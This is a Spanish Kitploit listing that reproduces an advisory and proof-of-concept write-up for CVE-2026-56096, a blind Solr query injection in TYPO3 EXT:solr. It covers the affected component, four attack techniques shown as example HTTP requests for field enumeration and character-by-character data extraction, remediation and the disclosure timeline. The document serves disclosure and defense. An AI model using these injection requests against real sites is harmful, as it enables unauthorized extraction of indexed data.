Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-56096 — Prueba de concepto y análisis técnico de CVE-2026-56096, una inyección de consulta Solr a ciegas en TYPO3 EXT:solr que permite la enumeración de campos y la extracción de datos sin autenticación. | Kitploit
Herramientas/GitHubGitHub/yairhinkis/cve-2026-56096
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónSeguridad WebPapers e Investigación
GitHubyairhinkis/cve-2026-56096

CVE-2026-56096

Prueba de concepto y análisis técnico de CVE-2026-56096, una inyección de consulta Solr a ciegas en TYPO3 EXT:solr que permite la enumeración de campos y la extracción de datos sin autenticación.

Ver Repositorio
hace 9h 56mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-56096: Inyección de consultas en Solr y extracción ciega de datos en TYPO3 EXT:solr

Se descubrió una vulnerabilidad de seguridad arquitectónica en la extensión oficial de Apache Solr para TYPO3 (EXT:solr / apache-solr-for-typo3/solr). El problema permite a atacantes remotos no autenticados inyectar sintaxis arbitraria de consultas Solr/Lucene a través del parámetro de búsqueda tx_solr[q], lo que posibilita la enumeración ciega no autorizada de campos y la extracción completa de metadatos del índice de búsqueda.


Metadatos

  • ID de CVE: CVE-2026-56096
  • Tipo de vulnerabilidad: CWE-943: Neutralización incorrecta de elementos especiales en la lógica de consultas de datos
  • Componente afectado: EXT:solr (Parámetro de búsqueda: tx_solr[q])
  • Puntuación CVSS v4.0: 6.3 (Media) —
CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
  • Investigador: Yair Hinkis

  • Descripción general de la vulnerabilidad

    La extensión EXT:solr acepta términos de búsqueda proporcionados por el usuario a través del parámetro tx_solr[q] y los reenvía al motor Apache Solr. Por diseño, la extensión permite operadores de consulta específicos —como comodines (*), comodines de un solo carácter (?), selectores de campo (:) y consultas de rango ([a TO z])— para admitir funcionalidades legítimas como el filtrado facetado.

    Debido a que estos caracteres se pasaban directamente a la construcción de la consulta del backend sin una lista blanca de aplicación ni una capa de abstracción de consultas, un atacante puede proporcionar sintaxis específica de campos para escapar de los límites de búsqueda previstos. Esto permite a usuarios no autenticados consultar campos internos de Solr directamente y extraer datos del índice mediante técnicas ciegas basadas en booleanos.


    Técnicas de ataque

    1. Enumeración de campos mediante field:*

    Al añadir un comodín a un nombre de campo arbitrario o supuesto, un atacante puede verificar si el campo existe dentro del esquema:

    root@kitploit:~
    GET /search?tx_solr[q]=siteHash:* HTTP/1.1
    Host: target.example.com
    
    

    Si el campo existe, Solr procesa la consulta en todos los registros coincidentes (a menudo desencadenando códigos de respuesta distintos o comportamientos relacionados con el volumen), lo que permite la enumeración automatizada de campos basada en listas de palabras.


    2. Extracción ciega de valores mediante comodines de prefijo

    Los atacantes pueden extraer valores de campos sensibles carácter por carácter utilizando inferencia booleana:

    root@kitploit:~
    GET /search?tx_solr[q]=siteHash:a* HTTP/1.1  --> Devuelve resultados de búsqueda (El valor comienza por 'a')
    GET /search?tx_solr[q]=siteHash:b* HTTP/1.1  --> "Nothing found" (El valor no comienza por 'b')
    
    

    3. Detección de longitud mediante el operador ?

    El operador comodín de un solo carácter (?) puede determinar la longitud exacta de una cadena almacenada antes de comenzar la iteración de caracteres:

    root@kitploit:~
    GET /search?tx_solr[q]=siteHash:????????????* HTTP/1.1   (Comprueba 12+ caracteres)
    GET /search?tx_solr[q]=siteHash:?????????????* HTTP/1.1  (Comprueba 13+ caracteres)
    
    

    4. Consultas de rango aceleradas ([a TO z])

    Las consultas de rango permiten la extracción mediante búsqueda binaria sobre el carácter inicial, reduciendo las solicitudes necesarias de 26 a ~5 por posición de carácter:

    root@kitploit:~
    GET /search?tx_solr[q]=siteHash:[a TO m] HTTP/1.1  --> Determina si el carácter está dentro de 'a'-'m'
    GET /search?tx_solr[q]=siteHash:[n TO z] HTTP/1.1  --> Determina si el carácter está dentro de 'n'-'z'
    
    

    Combinar la detección de longitud, las consultas de rango y los comodines de prefijo permite la extracción completa de campos con un número mínimo de solicitudes.


    Impacto

    • Violación de confidencialidad: Extracción completa de todos los campos indexados en Apache Solr (por ejemplo, hashes internos del sistema, contenido oculto de páginas, metadatos relacionados con usuarios e identificadores del sistema).
    • Elusión de controles de acceso: Elude los filtros de búsqueda del frontend y las restricciones de visualización de TypoScript.
    • Alcance: Afectaba a todas las instalaciones predeterminadas que utilizan el endpoint de búsqueda de EXT:solr.

    Remediación

    El escape global de caracteres es insuficiente porque operadores como * y : cumplen funciones de búsqueda previstas. La remediación requiere una lista blanca en la capa de aplicación y un modelo de análisis sintáctico:

    1. Analizar las cadenas de consulta proporcionadas por el usuario en un Árbol de Sintaxis Abstracta (AST) antes de enviarlas al motor Solr.
    2. Aplicar listas de permitidos estrictas sobre los campos de destino admisibles, impidiendo consultas directas de usuarios contra campos internos o restringidos.
    3. Neutralizar el abuso de operadores no incluidos en la lista blanca que se origine en contextos de entrada no confiables.

    Cronología de divulgación coordinada

    • 6 de marzo de 2026: Vulnerabilidad identificada durante una evaluación autorizada; notificación inicial al proveedor.
    • 17 de abril de 2026: El proveedor implementó mitigaciones locales en el perímetro; confirmó la naturaleza del error en el upstream.
    • 8 de mayo de 2026: Informe formal de vulnerabilidad enviado al Equipo de Seguridad de TYPO3 ([email protected]).
    • 15 de junio de 2026: El Equipo de Seguridad de TYPO3 confirmó la reproducción e inició el desarrollo del parche con los mantenedores de la extensión.
    • 25 de agosto de 2026: Se emitió el boletín de seguridad oficial, se publicó el parche y se asignó CVE-2026-56096.

    Referencias

    • Aviso de seguridad de TYPO3: TYPO3-EXT-SA-2026-025
    • Definición de CWE: CWE-943: Neutralización incorrecta de elementos especiales en la lógica de consultas de datos
    Descargar herramienta